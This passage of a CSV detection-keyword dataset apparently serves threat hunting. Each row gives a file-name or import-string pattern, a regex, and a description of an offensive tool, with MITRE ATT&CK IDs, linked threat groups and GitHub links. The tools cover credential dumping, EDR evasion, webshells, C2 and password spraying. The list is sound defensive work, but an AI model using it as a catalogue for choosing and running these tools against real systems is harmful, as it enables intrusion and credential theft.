Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45253"
"*framework.win32.domcachedump*",".{0,1000}framework\.win32\.domcachedump.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","45254"
"*framework.win32.domcachedumplive*",".{0,1000}framework\.win32\.domcachedumplive.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","45255"
"*framework.win32.lsasecrets*",".{0,1000}framework\.win32\.lsasecrets.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","45256"
"*framework.win32.lsasecretslive*",".{0,1000}framework\.win32\.lsasecretslive.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","45257"
"*framework/obfuscation/*",".{0,1000}framework\/obfuscation\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45258"
"*Framework-MobSF*",".{0,1000}Framework\-MobSF.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","N/A","10","18450","3353","2025-03-29T17:57:28Z","2015-01-31T04:36:01Z","45259"
"*frampton.py*",".{0,1000}frampton\.py.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","45260"
"*Freakboy/Godzilla*",".{0,1000}Freakboy\/Godzilla.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","45261"
"*freenas_reverse_root_shell_csrf*",".{0,1000}freenas_reverse_root_shell_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","45262"
"*Freeze_*_darwin_amd64*",".{0,1000}Freeze_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","#linux","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","45263"
"*Freeze_*_linux_amd64*",".{0,1000}Freeze_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","#linux","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","45264"
"*Freeze-rs -*",".{0,1000}Freeze\-rs\s\-.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45265"
"*Freeze-rs.exe*",".{0,1000}Freeze\-rs\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45266"
"*Freeze-rs_darwin_amd64*",".{0,1000}Freeze\-rs_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","#linux","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45267"
"*Freeze-rs_linux_amd64*",".{0,1000}Freeze\-rs_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","#linux","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45268"
"*Freeze-rs_windows_amd64.exe*",".{0,1000}Freeze\-rs_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45269"
"*frida -l disableRoot.js -f owasp.mstg.uncrackable1*",".{0,1000}frida\s\-l\sdisableRoot\.js\s\-f\sowasp\.mstg\.uncrackable1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45270"
"*frida-ps -U*",".{0,1000}frida\-ps\s\-U.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45271"
"*frida-trace -x ntdll.dll -i * -p *",".{0,1000}frida\-trace\s\-x\sntdll\.dll\s\-i\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","45272"
"*Friends-Security/ShadowHound*",".{0,1000}Friends\-Security\/ShadowHound.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","45273"
"*Frissi0n/GTFONow*",".{0,1000}Frissi0n\/GTFONow.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","45274"
"*frkngksl/NimExec*",".{0,1000}frkngksl\/NimExec.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","45275"
"*frkngksl/Shoggoth*",".{0,1000}frkngksl\/Shoggoth.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","45276"
"*frkngksl/UnlinkDLL*",".{0,1000}frkngksl\/UnlinkDLL.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","45277"
"*from . import knowsmore*",".{0,1000}from\s\.\simport\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","45278"
"*from .auth import Pac2User*",".{0,1000}from\s\.auth\simport\sPac2User.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","45279"
"*from .ccache import Ccache*",".{0,1000}from\s\.ccache\simport\sCcache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45280"
"*from .core import Fuzzer*",".{0,1000}from\s\.core\simport\sFuzzer.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45281"
"*from .dropbox import DropboxBeacon*",".{0,1000}from\s\.dropbox\simport\sDropboxBeacon.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","45282"
"*from .enumeration import ecrprivenum*",".{0,1000}from\s\.enumeration\simport\secrprivenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45283"
"*from .enumeration import ecrpubenum*",".{0,1000}from\s\.enumeration\simport\secrpubenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45284"
"*from .enumeration import loadbalancer as loadbalancer*",".{0,1000}from\s\.enumeration\simport\sloadbalancer\sas\sloadbalancer.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45285"
"*from .enumeration import rand_id_generator as rand_id_generator*",".{0,1000}from\s\.enumeration\simport\srand_id_generator\sas\srand_id_generator.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45286"
"*from .enumeration import s3aclenum as s3aclenum*",".{0,1000}from\s\.enumeration\simport\ss3aclenum\sas\ss3aclenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45287"
"*from .enumeration import snsenum*",".{0,1000}from\s\.enumeration\simport\ssnsenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45288"
"*from .modules.exploit import Exploit*",".{0,1000}from\s\.modules\.exploit\simport\sExploit.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","45289"
"*from .secretsdump import RemoteOperations*",".{0,1000}from\s\.secretsdump\simport\sRemoteOperations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","45290"
"*from .SirepCommand import SirepCommand*",".{0,1000}from\s\.SirepCommand\simport\sSirepCommand.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","45291"
"*from .SirepResult import SirepResult*",".{0,1000}from\s\.SirepResult\simport\sSirepResult.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","45292"
"*from .socks import SocksNegotiator*",".{0,1000}from\s\.socks\simport\sSocksNegotiator.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","45293"
"*from .wfuzz import *",".{0,1000}from\s\.wfuzz\simport\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45294"
"*from BlankOBFv2 import *",".{0,1000}from\sBlankOBFv2\simport\s.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","45295"
"*from bofhound import *",".{0,1000}from\sbofhound\simport\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","45296"
"*from bofhound.ad import*",".{0,1000}from\sbofhound\.ad\simport.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","45297"
"*from burp import *",".{0,1000}from\sburp\simport\s.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","network exploitation tool","N/A","7","630","195","2025-04-17T10:47:54Z","2014-06-23T10:04:13Z","45298"
"*from burp import*",".{0,1000}from\sburp\simport.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","45299"
"*from conpass.ntlminfo import *",".{0,1000}from\sconpass\.ntlminfo\simport\s.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","45300"
"*from conpass.password import *",".{0,1000}from\sconpass\.password\simport\s.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","45301"
"*from DiscordBot import MitmPuppeter*",".{0,1000}from\sDiscordBot\simport\sMitmPuppeter.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","45303"
"*from evilrdp.consolehelper*",".{0,1000}from\sevilrdp\.consolehelper.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","45304"
"*from exploit import pdfjs*",".{0,1000}from\sexploit\simport\spdfjs.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","0","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","45305"
"*from Exrop import *",".{0,1000}from\sExrop\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","45306"
"*from gatox.attack.attack import *",".{0,1000}from\sgatox\.attack\.attack\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45307"
"*from gatox.attack.cicd_attack import *",".{0,1000}from\sgatox\.attack\.cicd_attack\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45308"
"*from gatox.cli import cli*",".{0,1000}from\sgatox\.cli\simport\scli.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45309"
"*from gatox.cli.output import *",".{0,1000}from\sgatox\.cli\.output\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45310"
"*from gatox.github.api import *",".{0,1000}from\sgatox\.github\.api\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45311"
"*from gtfonow.*",".{0,1000}from\sgtfonow\..{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","45312"
"*from helpers.*_smbserver * import SimpleSMBServer*",".{0,1000}from\shelpers\..{0,1000}_smbserver\s.{0,1000}\simport\sSimpleSMBServer.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","45313"
"*from hiphp import *",".{0,1000}from\shiphp\simport\s.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","45314"
"*from holehe.core import*",".{0,1000}from\sholehe\.core\simport.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","45315"
